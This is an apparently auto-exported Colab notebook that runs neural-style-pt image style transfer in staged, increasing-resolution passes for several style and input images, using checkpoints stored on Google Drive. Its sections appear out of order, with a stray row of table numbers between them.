!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 5 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/5A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 6 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/6A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 7 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/7A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 8 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/8A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-8.png' -tv_weight 0 -original_colors 0 -backend cudnn | 318.319149 | 850 | 0.812646 | # -*- coding: utf-8 -*-
"""Neural Style Pattern Transfer.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ijYjSvGfWm1aUkw0stn6P7U8pYwhsbU0
"""
#!nvcc --version
print("Your GPU is a ")
!nvidia-smi -L
print("GPU Logs")
print("Nvidia K80 is not enough to do past A5 for high res inputs and A7 for low res inputs")
print("Nvidia P100 will do an A8 in around 23 minutes")
from psutil import virtual_memory
ram_gb = virtual_memory().total / 1e9
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(ram_gb))
if ram_gb < 20:
print('Not using a high-RAM runtime')
else:
print('You are using a high-RAM runtime!')
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/ProGamerGov/neural-style-pt.git
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/channel_pruning.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nin_imagenet.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg16-00b39a1b.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg19-d01eb7cb.pth" /content/neural-style-pt/models/
!pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio===0.7.2 -f https://download.pytorch.org/whl/torch_stable.html
#---------#
# STYLE 1 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/1A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
